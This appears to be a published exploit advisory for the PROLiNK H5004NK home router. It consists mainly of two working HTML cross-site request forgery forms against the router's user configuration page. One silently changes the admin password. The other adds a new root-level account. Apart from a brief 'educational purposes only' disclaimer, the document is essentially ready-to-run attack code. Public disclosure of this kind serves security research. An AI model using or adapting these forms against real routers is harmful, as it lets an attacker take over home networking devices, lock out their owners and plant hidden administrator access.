PROLiNK H5004NK Cross Site Request Forgery

Posted on 22 April 2015
# Exploit Title: PROLiNK H5004NK Multiple Vulnerabilities
# Date: 16-04-2015
# Firmware: R76S Slt 4WNE1 6.1R
# Tested on: Windows 8 64-bit
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Disclaimer: Use this for educational purposes only!

#1| Admin Password Manipulation XSRF
-----------------------------------------------------

<html>
 <body>
 <form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
 <input type="hidden" name="username" value="admin" />
 <input type="hidden" name="oldpass" value="password" />
 <input type="hidden" name="newpass" value="admin" />
 <input type="hidden" name="confpass" value="admin" />
 <input type="hidden" name="modify" value="Modify" />
 <input type="hidden" name="select" value="s0" />
 <input type="hidden" name="hiddenpass" value="password" />
 <input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
 <input type="submit" value="Submit request" />
 </form>
 </body>
</html>

#2| Adding a New Root Account XSRF
-----------------------------------------------------

<html>
 <body>
 <form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
 <input type="hidden" name="username" value="haxor" />
 <input type="hidden" name="privilege" value="2" />
 <input type="hidden" name="newpass" value="123" />
 <input type="hidden" name="confpass" value="123" />
 <input type="hidden" name="adduser" value="Add" />
 <input type="hidden" name="hiddenpass" value="" />
 <input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
 <input type="submit" value="Submit request" />
 </form>
 </body>
</html>
TOP
Malware :

Last 20
Exploits :

Last 20